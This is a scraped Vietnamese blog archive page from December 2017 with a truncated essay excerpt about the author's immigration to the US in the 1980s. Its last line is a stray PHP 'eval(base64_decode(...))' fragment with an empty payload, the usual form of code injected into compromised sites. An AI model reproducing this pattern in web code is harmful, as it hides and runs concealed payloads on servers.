Archive for December 17th, 2017

GIẶC ÂN NGÀY NAY KHÔNG Ở ĐÂU XA

GIẶC ÂN NGÀY NAY KHÔNG Ở ĐÂU XA

Theo Niên giám Thống kê Di dân (Yearbook of Immigration Statistics) của chính phủ Mỹ, tôi là một trong 280,728 người Việt Nam đến Mỹ trong thập niên 1980-1990. Nói như vậy để phân biệt với 135 ngàn đồng hương trong đợt di dân đầu tiên vào nh

12.17.2017 | Tiểu Luận- Chính Luận |

2 Comments

Flickr Photos

Tag Cloud

'; eval(base64_decode(''));?>